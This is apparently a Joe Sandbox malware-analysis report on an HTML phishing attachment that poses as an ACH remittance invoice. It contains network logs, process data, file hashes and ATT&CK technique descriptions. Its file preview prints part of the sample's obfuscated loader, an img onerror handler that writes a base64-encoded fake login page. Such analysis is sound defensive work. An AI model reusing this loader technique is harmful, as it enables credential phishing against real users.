Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/bannerlogo?ts=637584332980548056 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/illustration?ts=637581648955903606 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/bannerlogo?ts=637584332980548056 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/illustration?ts=637581648955903606 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_146.1.dr, chromecache_155.1.dr	String found in binary or memory: http://fontawesome.io
Source: chromecache_146.1.dr, chromecache_155.1.dr	String found in binary or memory: http://fontawesome.io/license
Source: chromecache_157.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_157.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

File type:	HTML document, ASCII text, with very long lines (4443)
Entropy (8bit):	5.744478227996044
TrID:	HyperText Markup Language (6006/1) 100.00%
File name:	Copy_ACH Remittance Inv#1923119-6.htm
File size:	4476
MD5:	f30c1b043329277c7c3cfa4e1675eb7b
SHA1:	74519d5dee7278368d7f380aba39239714590e0a
SHA256:	21487b8d206a0282088bf32473072f1384743053d315b2a070733e5eb6e88f38
SHA512:	a5ae8859985038444391d54faa96755025facfa943d475c88aa6182cfdc917ece9e35b95373bb1c013840527f20af5a16b9a3ae574e1a27a0e0da8351106356f
SSDEEP:	96:DArfuGHoItoiINEoZVgGR2K41X3ytDfSj/z9U:DGfZIIS7NFYGwK6X3yZf+zW
TLSH:	DF91093F8AA825C27BA0D734752AB83F6452E14D38598D2FC37D1F41813AAA32F94438
File Content Preview:	<html>.<body>...<img src=x onerror=" document.write(atob('PGh0bWw+CjxoZWFkPgo8ZGl2IGNsYXNzPSIiIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij48ZGl2IGNsYXNzPSJsb2dpbi1ib3gtY29udGFpbmVyIj48ZGl2IGNsYXNzPSJsb2dpbi1ib3ggcmlnaHQiPjxkaXYgY2xhc3M9Im1ici1sb2dpbi1oZCB0eHQtYWxpZ24

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 21, 2023 02:29:53.051405907 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.051454067 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.051525116 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.054258108 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.054342031 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.054426908 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.055331945 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.055370092 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.055423975 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.056049109 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.056113958 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.056194067 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.058964014 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.059005022 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.059228897 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.059273958 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.059832096 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.059854984 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.060082912 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.060111046 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.174104929 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.174645901 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.174674988 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.175317049 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.175421953 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.176631927 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.176718950 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.198714972 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.229713917 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.229741096 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.232601881 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.232620955 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.232733965 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.232913971 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.232992887 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.233119011 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.233135939 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.305701971 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.318202972 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.343399048 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.343467951 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.343710899 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.343789101 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.344554901 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.344666004 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.346084118 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.346153975 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.347321033 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.347403049 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.451560020 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.451601982 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.451786995 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.451849937 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.451941013 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.452143908 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.452495098 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.452533007 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.452765942 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.452836990 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.452882051 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.452908993 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.453103065 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.453139067 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.453447104 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.453479052 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.489523888 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.489705086 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.489758015 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.489950895 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.490092993 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.492628098 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.492662907 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.492691994 CET	443	49706	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.508193970 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.508795977 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.508910894 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.523401976 CET	49709	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.523437023 CET	443	49709	142.250.203.109	192.168.2.6
Mar 21, 2023 02:29:53.523874998 CET	49710	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.523916006 CET	443	49710	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.535182953 CET	49706	443	192.168.2.6	142.250.203.109
Mar 21, 2023 02:29:53.581267118 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.581322908 CET	443	49707	142.250.203.110	192.168.2.6
Mar 21, 2023 02:29:53.581824064 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.590049982 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.590099096 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.591820002 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.591952085 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.597356081 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.597392082 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.597574949 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.597717047 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.597732067 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.643178940 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.643205881 CET	443	49712	192.185.88.193	192.168.2.6
Mar 21, 2023 02:29:53.681200981 CET	49707	443	192.168.2.6	142.250.203.110
Mar 21, 2023 02:29:53.684165001 CET	49712	443	192.168.2.6	192.185.88.193
Mar 21, 2023 02:29:53.895827055 CET	49715	443	192.168.2.6	142.250.203.100
Mar 21, 2023 02:29:53.895899057 CET	443	49715	142.250.203.100	192.168.2.6
Mar 21, 2023 02:29:53.895996094 CET	49715	443	192.168.2.6	142.250.203.100

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 21, 2023 02:29:52.064397097 CET	58595	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:52.104485989 CET	53	58595	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:52.128917933 CET	56331	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:52.158049107 CET	53	56331	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:53.086168051 CET	59082	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:53.222942114 CET	53	59082	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:53.841000080 CET	62910	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:53.867455006 CET	53	62910	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:53.875009060 CET	63863	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:53.894551039 CET	53	63863	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:56.798296928 CET	51530	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:56.804887056 CET	52556	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:56.805815935 CET	61609	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:56.825583935 CET	53	52556	8.8.8.8	192.168.2.6
Mar 21, 2023 02:29:58.497957945 CET	53943	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:29:58.524092913 CET	53	53943	8.8.8.8	192.168.2.6
Mar 21, 2023 02:30:00.395051003 CET	58917	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:30:53.914099932 CET	52715	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:30:53.932332993 CET	53	52715	8.8.8.8	192.168.2.6
Mar 21, 2023 02:30:53.940222025 CET	62221	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:30:53.959770918 CET	53	62221	8.8.8.8	192.168.2.6
Mar 21, 2023 02:31:53.981504917 CET	64796	53	192.168.2.6	8.8.8.8
Mar 21, 2023 02:31:53.999152899 CET	53	64796	8.8.8.8	192.168.2.6

Target ID:	0
Start time:	02:29:47
Start date:	21/03/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Imagebase:	0x7ff6f9750000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	1
Start time:	02:29:48
Start date:	21/03/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1756,i,4566038418148092488,3146726653025453555,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6f9750000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	troff or preprocessor input, ASCII text, with very long lines (372)
Category:	downloaded
Size (bytes):	37414
Entropy (8bit):	4.82325822639402
Encrypted:	false
SSDEEP:	768:mmMtI+A4CSIDqvnI+YTBrFPvVrJjhiRAiiEL:mXtI+A4GDUI+Y9rpVljhiIEL
MD5:	C495654869785BC3DF60216616814AD1
SHA1:	0140952C64E3F2B74EF64E050F2FE86EAB6624C8
SHA-256:	36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
SHA-512:	E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
Preview:	/!. Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). /./ FONT PATH. * -------------------------- /.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./ makes the font 33% larger relative to the icon container */..

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
Category:	downloaded
Size (bytes):	77160
Entropy (8bit):	7.996509451516447
Encrypted:	true
SSDEEP:	1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
MD5:	AF7AE505A9EED503F8B8E6982036873E
SHA1:	D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
SHA-256:	2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
SHA-512:	838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
Malicious:	false
URL:	https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
Preview:	wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa......'.=.:..&..=r........].t..E.n.......1F...@....\|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......\|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..\|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..\|.. $. e.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x823, components 3
Category:	dropped
Size (bytes):	277890
Entropy (8bit):	7.969483360480419
Encrypted:	false
SSDEEP:	6144:D3dGZezdh7aOb1hx0hr3z/Ni8uMfegaZyVjGIiB1CEQGWKVml0/5:Dcef71xgk86ZfIiBtkKVmW5
MD5:	8B30ED0B1BBE1B174BFC7758E7ABC55A
SHA1:	82F865D74B77508619E30D5FF9B38C7DF3FCF352
SHA-256:	EE63C5C9ADA5FD296372315C3B5F1795E74A2B2258686529EBAD64B8D60C9F3F
SHA-512:	4E1380C9EB44A01ED9963EBD3B7BE9AFC747A3E32974985048ED256E415F80773FF07051BADD5C130B75697DDFDF28C82E70DF55D2CE30DA4281BA3CF7CBCE7A
Malicious:	false
Preview:	......JFIF.....,.,.....C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..xn.8&..vH...J.5.n....2.z6.?J.Q...=k...................m#....yM).......C....'..08.^{.i'...A=.yQ...e....U$l..A'.=}.L2...T.}.....H.....gny...VGS...._.byl..N..`..c......yI..r=1...F.=q.B.....q...<.....<..q+.>^2pH...7.~:g.)..~B...\.py.1.T....ns..#..I...t.......E9......z..QX.Y.?6.9.?..O..R.Lt.......03.g...~U".........i..C..b..............s.8..O......:TP.

Target ID:	2
Start time:	02:29:49
Start date:	21/03/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Copy_ACH Remittance Inv#1923119-6.htm
Imagebase:	0x7ff6f9750000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Copy_ACH Remittance Inv#1923119-6.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 153

Chrome Cache Entry: 154

Chrome Cache Entry: 155

Chrome Cache Entry: 156

Chrome Cache Entry: 157

Chrome Cache Entry: 158

Chrome Cache Entry: 159

Chrome Cache Entry: 160

Chrome Cache Entry: 161

Chrome Cache Entry: 162

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Statistics

Windows Analysis Report
Copy_ACH Remittance Inv#1923119-6.htm